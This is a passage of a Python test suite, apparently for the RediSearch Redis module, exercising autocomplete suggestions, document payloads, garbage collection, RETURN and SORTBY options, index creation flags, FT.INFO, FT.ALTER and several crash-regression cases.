    # Each addition grows the dictionary by one
    sz = 2
    for term in terms:
        env.assertEqual(sz, r.execute_command(
            'ft.SUGADD', 'ac', term, sz - 1))
        sz += 1
    for _ in r.retry_with_rdb_reload():
        env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
        # search not fuzzy
        env.assertEqual(["hello world", "hello werld"],
                        r.execute_command("ft.SUGGET", "ac", "hello"))
        # print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
        # search fuzzy - should yield more results
        env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
                        r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
        # search fuzzy with limit of 1
        env.assertEqual(['hello world'],
                        r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
        # scores should return on WITHSCORES
        rc = r.execute_command(
            "ft.SUGGET", "ac", "hello", "WITHSCORES")
        env.assertEqual(4, len(rc))
        env.assertTrue(float(rc[1]) > 0)
        env.assertTrue(float(rc[3]) > 0)
    # SUGDEL returns 1 for an existing entry, 0 for a missing one
    rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
    env.assertEqual(1L, rc)
    rc = r.execute_command("ft.SUGDEL", "ac", "world")
    env.assertEqual(0L, rc)
    rc = r.execute_command("ft.SUGGET", "ac", "hello")
    env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
    """WITHPAYLOADS on FT.SUGGET: entries added without a payload (or
    with an empty one) return None in the payload slot."""
    r = env
    env.assertEqual(1, r.execute_command(
        'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
    env.assertEqual(2, r.execute_command(
        'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
    env.assertEqual(3, r.execute_command(
        'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
    env.assertEqual(4, r.execute_command(
        'ft.SUGADD', 'ac', 'hello nopayload2', 1))
    res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
    env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
                        res)
    # Without WITHPAYLOADS only the suggestion strings come back
    res = r.execute_command("FT.SUGGET", "ac", "hello")
    env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
                        res)
    res = r.execute_command(
        "FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
    # we don't compare the scores because they may change
    env.assertEqual(12, len(res))
def testPayload(env):
    """Per-document payloads set at FT.ADD time come back with
    WITHPAYLOADS, interleaved as [id, payload, fields, ...]."""
    env.assertOk(env.execute_command(
        'ft.create', 'idx', 'schema', 'f', 'text'))
    for docnum in range(10):
        env.assertOk(env.execute_command(
            'ft.add', 'idx', '%d' % docnum, 1.0,
            'payload', 'payload %d' % docnum,
            'fields', 'f', 'hello world'))

    for _ in env.retry_with_rdb_reload():
        # Without WITHPAYLOADS: [count] + 2 entries per doc
        plain = env.execute_command('ft.search', 'idx', 'hello world')
        env.assertEqual(21, len(plain))

        # With WITHPAYLOADS: [count] + 3 entries per doc
        with_pl = env.execute_command(
            'ft.search', 'idx', 'hello world', 'withpayloads')
        env.assertEqual(31, len(with_pl))
        env.assertEqual(10, with_pl[0])
        # Each doc id is followed by its own 'payload <id>' string
        for pos in range(1, 30, 3):
            env.assertEqual(with_pl[pos + 1], 'payload %s' % with_pl[pos])
def testGarbageCollector(env):
    """After deleting every document, forced GC runs must reclaim index
    memory and zero out num_docs/num_records in FT.INFO."""
    env.skipOnCluster()
    if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
        # this test is not relevant for fork gc cause its not cleaning the last block
        raise unittest.SkipTest()
    N = 100
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    # Each doc holds 10 random terms out of term0..term9
    for i in range(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
                                       'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))

    def get_stats(r):
        # Parse the flat FT.INFO reply into a dict, with the nested
        # gc_stats sub-reply parsed into a float-valued dict
        res = r.execute_command('ft.info', 'idx')
        d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
        gc_stats = {d['gc_stats'][x]: float(
            d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
        d['gc_stats'] = gc_stats
        return d

    stats = get_stats(r)
    if 'current_hz' in stats['gc_stats']:
        env.assertGreater(stats['gc_stats']['current_hz'], 8)
    env.assertEqual(0, stats['gc_stats']['bytes_collected'])
    env.assertGreater(int(stats['num_records']), 0)

    initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
    for i in range(N):
        env.assertEqual(1, r.execute_command(
            'ft.del', 'idx', 'doc%d' % i))

    for _ in range(100):
        # gc is random so we need to do it long enough times for it to work
        env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')

    stats = get_stats(r)
    env.assertEqual(0, int(stats['num_docs']))
    env.assertEqual(0, int(stats['num_records']))
    if not env.is_cluster():
        env.assertEqual(100, int(stats['max_doc_id']))
        if 'current_hz' in stats['gc_stats']:
            env.assertGreater(stats['gc_stats']['current_hz'], 30)
        currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
        # print initialIndexSize, currentIndexSize,
        # stats['gc_stats']['bytes_collected']
        env.assertGreater(initialIndexSize, currentIndexSize)
        env.assertGreater(stats['gc_stats'][
            'bytes_collected'], currentIndexSize)

    # Every term's posting list should now be empty
    for i in range(10):
        res = r.execute_command('ft.search', 'idx', 'term%d' % i)
        env.assertEqual([0], res)
def testReturning(env):
    """The RETURN clause: RETURN 0 suppresses content, RETURN 1 <field>
    yields only that field, missing fields are omitted, and a bogus
    field count is a hard error."""
    env.assertCmdOk('ft.create', 'idx', 'schema',
                    'f1', 'text',
                    'f2', 'text',
                    'n1', 'numeric', 'sortable',
                    'f3', 'text')
    for i in range(10):
        env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
                        'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
                        'n1', i)
    # RETURN 0. Simplest case
    for x in env.retry_with_reload():
        res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
        env.assertEqual(11, len(res))
        env.assertEqual(10, res[0])
        for r in res[1:]:
            env.assertTrue(r.startswith('DOC_'))

    # RETURN 1 <field>: each hit carries exactly that one field
    for field in ('f1', 'f2', 'f3', 'n1'):
        res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
        env.assertEqual(21, len(res))
        env.assertEqual(10, res[0])
        for pair in grouper(res[1:], 2):
            docname, fields = pair
            env.assertEqual(2, len(fields))
            env.assertEqual(field, fields[0])
            env.assertTrue(docname.startswith('DOC_'))

    # Test that we don't return SORTBY fields if they weren't specified
    # also in RETURN
    res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
                  'sortby', 'n1', 'ASC')
    row = res[2]
    # get the first result
    env.assertEqual(['f1', 'val1'], row)

    # Test when field is not found
    res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
    env.assertEqual(21, len(res))
    env.assertEqual(10, res[0])

    # # Test that we don't crash if we're given the wrong number of fields
    with env.assertResponseError():
        res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
    """Helper: create 'idx' with the given subset of NOOFFSETS/NOFIELDS/
    NOFREQS flags and verify the behavioural consequences of each flag.

    Empty strings in *options* are filtered out so callers can pass ''
    as a placeholder for "no flag".
    """
    options = [x for x in options if x]
    has_offsets = 'NOOFFSETS' not in options
    has_fields = 'NOFIELDS' not in options
    has_freqs = 'NOFREQS' not in options
    try:
        # Drop any index left over from a previous combination
        env.cmd('ft.drop', 'idx')
    except:
        pass

    options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
    env.assertCmdOk('ft.create', *options)
    for i in range(10):
        env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
            i), 0.5, 'fields', 'f1', 'value for {}'.format(i))

    # Query
#     res = env.cmd('ft.search', 'idx', "value for 3")
#     if not has_offsets:
#         env.assertIsNone(res)
#     else:
#         env.assertIsNotNone(res)

    # Frequencies: doc200 repeats 'foo' 10 times so term frequency should
    # rank it first — unless NOFREQS discarded the frequency data
    env.assertCmdOk('ft.add', 'idx', 'doc100',
                    1.0, 'fields', 'f1', 'foo bar')
    env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
                    'fields', 'f1', ('foo ' * 10) + ' bar')
    res = env.cmd('ft.search', 'idx', 'foo')
    env.assertEqual(2, res[0])
    if has_offsets:
        docname = res[1]
        if has_freqs:
            env.assertEqual('doc200', docname)
        else:
            env.assertEqual('doc100', docname)

    # With NOFIELDS, @f2: restriction cannot be enforced, so the @f2 query
    # also matches the doc whose text went into f1
    env.assertCmdOk('ft.add', 'idx', 'doc300',
                    1.0, 'fields', 'f1', 'Hello')
    res = env.cmd('ft.search', 'idx', '@f2:Hello')
    if has_fields:
        env.assertEqual(1, len(res))
    else:
        env.assertEqual(3, len(res))
def testCreationOptions(env):
    """Drive the creation-options helper over every combination of the
    index flags (the empty string stands for "no flag")."""
    from itertools import combinations
    flags = ('NOOFFSETS', 'NOFREQS', 'NOFIELDS', '')
    for size in range(1, 5):
        for combo in combinations(flags, size):
            _test_create_options_real(env, *combo)
def testInfoCommand(env):
    """FT.INFO must report correct counters, field specs and the set of
    creation flags in 'index_options'."""
    from itertools import combinations
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
    N = 50
    for i in xrange(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
                                       'title', 'hello term%d' % i))
    for _ in r.retry_with_rdb_reload():
        res = r.execute_command('ft.info', 'idx')
        # FT.INFO replies as a flat [key, value, ...] list
        d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}

        env.assertEqual(d['index_name'], 'idx')
        env.assertEqual(d['index_options'], ['NOFIELDS'])
        env.assertListEqual(
            d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])

        if not env.is_cluster():
            # 'hello' is shared, each term%d is unique: N + 1 terms total
            env.assertEquals(int(d['num_docs']), N)
            env.assertEquals(int(d['num_terms']), N + 1)
            env.assertEquals(int(d['max_doc_id']), N)
            env.assertEquals(int(d['records_per_doc_avg']), 2)
            env.assertEquals(int(d['num_records']), N * 2)

            env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
            env.assertGreater(float(d['key_table_size_mb']), 0)
            env.assertGreater(float(d['inverted_sz_mb']), 0)
            env.assertGreater(float(d['bytes_per_record_avg']), 0)
            env.assertGreater(float(d['doc_table_size_mb']), 0)

    # Recreate the index with each flag combination and check that
    # index_options reflects exactly the flags that were given
    for x in range(1, 5):
        for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
            combo = list(filter(None, combo))
            options = combo + ['schema', 'f1', 'text']
            try:
                env.cmd('ft.drop', 'idx')
            except:
                pass
            env.assertCmdOk('ft.create', 'idx', *options)
            info = env.cmd('ft.info', 'idx')
            ix = info.index('index_options')
            env.assertFalse(ix == -1)
            opts = info[ix + 1]
            # make sure that an empty opts string returns no options in
            # info
            if not combo:
                env.assertListEqual([], opts)

            for option in filter(None, combo):
                env.assertTrue(option in opts)
def testNoStem(env):
    """A NOSTEM text field must not match stemmed variants of its terms,
    while an ordinary text field does."""
    env.cmd('ft.create', 'idx', 'schema', 'body',
            'text', 'name', 'text', 'nostem')
    for _ in env.retry_with_reload():
        # Clear any document left over from a previous iteration
        try:
            env.cmd('ft.del', 'idx', 'doc')
        except redis.ResponseError:
            pass

        # Index the same word into both fields
        env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
                        'body', "located",
                        'name', "located")

        # 'location' stems to the same root as 'located'; only the
        # stemmed (body) field should produce a hit
        body_hits = env.cmd('ft.search', 'idx', '@body:location')
        name_hits = env.cmd('ft.search', 'idx', '@name:location')
        env.assertEqual(0, name_hits[0])
        env.assertEqual(1, body_hits[0])
def testSearchNonexistField(env):
    """Regression for GH issue 133: a GEOFILTER on a field that is not in
    the schema must not crash the server."""
    # GH Issue 133
    env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
            'weight', 5.0, 'body', 'text', 'url', 'text')
    # 'place' is stored (nosave is not set for it in the schema) but unindexed
    env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
            'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
    env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
            'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
    """Regression for GH issue 131: SORTBY on a field the matching doc
    never set must not crash."""
    # GH Issue 131
    env.cmd('ft.create', 'ix', 'schema', 'txt',
            'text', 'num', 'numeric', 'sortable')
    env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
    env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
    """Regression for GH issue 207: 10 threads indexing 100 docs each must
    leave exactly 1000 documents in the index."""
    # GH Issue 207
    env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
    from threading import Thread
    env.getConnection()
    ndocs = 100

    def runner(tid):
        # Each thread uses its own connection and a disjoint doc-id space
        cli = env.getConnection()
        for num in range(ndocs):
            cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
                                'fields', 'txt', 'hello world' * 20)
    ths = []
    for tid in range(10):
        ths.append(Thread(target=runner, args=(tid,)))

    [th.start() for th in ths]
    [th.join() for th in ths]
    res = env.cmd('ft.info', 'idx')
    d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
    env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
    """Regression for GH issue 210: re-adding an existing doc id without
    REPLACE must fail and leave the original content intact."""
    # Tests issue #210
    env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
    env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
    with env.assertResponseError():
        env.cmd('ft.add', 'idx', 'doc1', 1.0,
                'fields', 'txt', 'goodbye world')

    # The failed add must not have touched the document or the index
    env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
    env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
    env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])

    # Now with replace
    env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
            'fields', 'txt', 'goodbye world')
    env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
    env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
    env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
    """Many processes racing to add the SAME doc ids: exactly one add per
    id may win, all other attempts error, and the index must stay sane."""
    from multiprocessing import Process
    import random

    env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
    docs_per_thread = 100
    num_threads = 50

    docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]

    def thrfn():
        # Each process adds the shared ids in a random order; duplicate
        # adds fail, which is expected — errors are deliberately ignored
        myIds = docIds[::]
        random.shuffle(myIds)
        cli = env.getConnection()
        with cli.pipeline(transaction=False) as pl:
            for x in myIds:
                pl.execute_command('ft.add', 'idx', x, 1.0,
                                   'fields', 'txt', ' hello world ' * 50)
            try:
                pl.execute()
            except Exception as e:
                pass
                # print e

    thrs = [Process(target=thrfn) for x in range(num_threads)]
    [th.start() for th in thrs]
    [th.join() for th in thrs]
    res = env.cmd('ft.info', 'idx')
    d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
    env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
    """Document ids containing an embedded NUL byte must index, search and
    survive a reload intact."""
    env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
    # Insert a document whose key contains a binary zero
    env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
    env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
    for _ in env.reloading_iterator():
        exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
        res = env.cmd('ft.search', 'idx', 'match')
        env.assertEqual(exp, res)
def testNonDefaultDb(env):
    """FT.CREATE must be refused on any redis database other than db 0."""
    if env.is_cluster():
        raise unittest.SkipTest()

    # Should be ok
    env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
    try:
        env.cmd('SELECT 1')
    except redis.ResponseError:
        # SELECT unsupported in this environment — nothing left to test
        return

    # Should fail
    with env.assertResponseError():
        env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
    """Unindexed fields repeated in FT.ADD: one of the repeated values is
    kept for the duplicated name, and names differing only in case stay
    distinct."""
    env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
    env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
            'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')

    # FT.GET replies as a flat [name, value, ...] list; pair it up
    raw = env.cmd('ft.get', 'idx', 'doc')
    fields = dict(zip(raw[::2], raw[1::2]))
    env.assertTrue(fields['f1'] in ('f1val', 'f1val2'))
    env.assertEqual('f1Val3', fields['F1'])
def testDuplicateFields(env):
    """A schema field given more than once in FT.ADD / FT.ADDHASH must be
    rejected, including via REPLACE and REPLACE PARTIAL."""
    env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
            'TEXT', 'num', 'NUMERIC', 'SORTABLE')
    for _ in env.retry_with_reload():
        # Ensure the index assignment is correct after an rdb load
        with env.assertResponseError():
            env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
                    'txt', 'foo', 'txt', 'bar', 'txt', 'baz')

        # Try add hash
        env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
        # Get the actual value:

        from redis import ResponseError
        if not env.is_cluster():
            # The hash names collide case-insensitively on schema field 'txt'
            with env.assertResponseError(contained='twice'):
                env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)

        # Try with REPLACE
        with env.assertResponseError():
            env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
                    'txt', 'foo', 'txt', 'bar')

        # With replace partial
        env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
                'PARTIAL', 'FIELDS', 'num', 42)
        with env.assertResponseError():
            env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
                    'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
    """A schema that declares the same field name twice must be rejected."""
    with env.assertResponseError():
        env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
                'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
    """SORTBY on a sortable field the document never populated must not
    crash (the doc still gets a sort vector via its other sortable field)."""
    # Note, the document needs to have one present sortable field in
    # order for the indexer to give it a sort vector
    env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
            'SORTABLE', 'firstName', 'text', 'SORTABLE')
    env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
    res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
                  "firstName", "ASC", "limit", 0, 100)
    # commented because we don't filter out exclusive sortby fields
    # env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
    """FT.ADD/FT.ADDHASH must work when invoked from Lua scripts and from
    a MULTI/EXEC pipeline without crashing the server."""
    if env.is_cluster():
        raise unittest.SkipTest()
    # Ensure we can work in Lua and Multi environments without crashing
    env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
    env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
    env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)

    r = env.getConnection()

    r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
    r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)

    # Try in a pipeline:
    with r.pipeline(transaction=True) as pl:
        pl.execute_command('ft.add', 'idx', 'doc2',
                           1.0, 'fields', 'f1', 'v3')
        pl.execute_command('ft.add', 'idx', 'doc3',
                           1.0, 'fields', 'f1', 'v4')
        # NOTE(review): 'hashdoc2' differs in case from the 'hashDoc2'
        # hash created above — likely a typo; verify intended behaviour
        pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
        pl.execute()
def testLanguageField(env):
    """A schema field literally named 'language' must be indexable, while
    the LANGUAGE keyword itself still validates its argument."""
    env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
    env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
            'FIELDS', 'language', 'gibberish')
    res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
    env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
    # The only way I can verify that LANGUAGE is parsed twice is ensuring we
    # provide a wrong language. This is much easier to test than trying to
    # figure out how a given word is stemmed
    with env.assertResponseError():
        env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
                'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
    """Regression: reloading an index holding many documents without
    sortable fields previously crashed on an uninitialised sort vector."""
    env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
    for docnum in range(2000):
        env.cmd('FT.ADD', 'idx', 'doc{}'.format(docnum), 1.0,
                'FIELDS', 'f1', 'HELLO')

    env.broadcast('SAVE')
    # Repeated reloads must not crash the server
    for _ in range(10):
        env.broadcast('DEBUG RELOAD')
def normalize_row(row):
    """Normalize a flat reply row via to_dict (defined elsewhere in this
    module)."""
    return to_dict(row)
def assertAggrowsEqual(env, exp, got):
    """Compare two aggregation replies while ignoring row order.

    The leading result count must match exactly; the remaining rows are
    dict-ified and compared as sorted lists.
    """
    env.assertEqual(exp[0], got[0])
    env.assertEqual(len(exp), len(got))
    # and now, it's just free form:
    exp = sorted(to_dict(x) for x in exp[1:])
    got = sorted(to_dict(x) for x in got[1:])
    env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
    """Compare two search replies of the form [count, id, fields, ...].

    Doc ids are compared positionally; each fields list is dict-ified so
    field ordering inside a document does not matter. NOTE: the `inorder`
    parameter is currently unused — results are always compared in order.
    """
    from pprint import pprint
    # pprint(exp)
    # pprint(got)
    env.assertEqual(exp[0], got[0])
    env.assertEqual(len(exp), len(got))
    # Pair each doc id with its fields list
    exp = list(grouper(exp[1:], 2))
    got = list(grouper(got[1:], 2))
    for x in range(len(exp)):
        exp_did, exp_fields = exp[x]
        got_did, got_fields = got[x]
        env.assertEqual(exp_did, got_did, message="at position {}".format(x))

        got_fields = to_dict(got_fields)
        exp_fields = to_dict(exp_fields)
        env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
    """FT.ALTER SCHEMA ADD: new text, sortable and numeric fields must be
    usable for documents added after the alteration and survive reload."""
    env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
    # f2 is not in the schema yet, so doc1's f2 is not indexed
    env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
    env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
    env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
    for _ in env.retry_with_reload():
        # Only doc2 (added after the ALTER) matches on f2 content
        ret = env.cmd('FT.SEARCH', 'idx', 'world')
        env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)

    env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
    for x in range(10):
        env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
                'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))

    for _ in env.retry_with_reload():
        # Test that sortable works
        res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
        exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
            'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
        assertResultsEqual(env, exp, res)

    # Test that we can add a numeric field
    env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
    env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
    env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
    for _ in env.retry_with_reload():
        res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
        env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
    # Test the constraints of the ALTER command
    env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
    # A plain index is limited to 32 text fields; fill it to the brim.
    for x in range(1, 32):
        env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
        # OK for now.

    # Should be too many indexes
    env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
                     'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')

    # MAXTEXTFIELDS lifts the 32-field limit.
    env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
    # print env.cmd('FT.INFO', 'idx2')
    for x in range(1, 50):
        env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')

    env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
    for _ in env.retry_with_reload():
        ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
        env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)

    env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
    # Try to alter the index with garbage
    env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
                     'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
    ret = to_dict(env.cmd('ft.info', 'idx3'))
    # The failed ALTER must not have left a partial field behind.
    env.assertEqual(1, len(ret['fields']))

    # ALTER on a nonexistent index is an error.
    env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
                     'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')

    # test with no fields!
    env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
    # Regression test for GH issue 366: ADDHASH followed by DEL used to
    # leave the index in a state that corrupted the RDB file.
    if env.is_cluster():
        raise unittest.SkipTest('ADDHASH unsupported!')
    # Test random RDB regressions, see GH 366
    env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
    env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
    env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
    env.cmd('FT.DEL', 'idx1', 'foo')
    for _ in env.retry_with_reload():
        pass  # --just ensure it doesn't crash
def testIssue366_2(env):
    # Regression test for GH issue 366: a PARTIAL replace of a document
    # that carries a PAYLOAD used to corrupt the saved RDB.
    # FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
    # FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
    # FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
    # shutdown
    env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
    env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
            'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
    env.cmd('ft.add', 'idx1', 'doc1', 1,
            'PAYLOAD', '{"hello":"world2"}',
            'REPLACE', 'PARTIAL',
            'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
    for _ in env.retry_with_reload():
        pass  # reload must not crash
def testIssue654(env):
    # Crashes during FILTER
    env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
    env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
    env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
    # '@version' is deliberately NOT in the schema; the server used to crash
    # when filtering on an unknown field.  The result itself is irrelevant.
    res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
    # A document that was partially replaced must still be replaceable and
    # readable after an RDB dump/reload cycle.
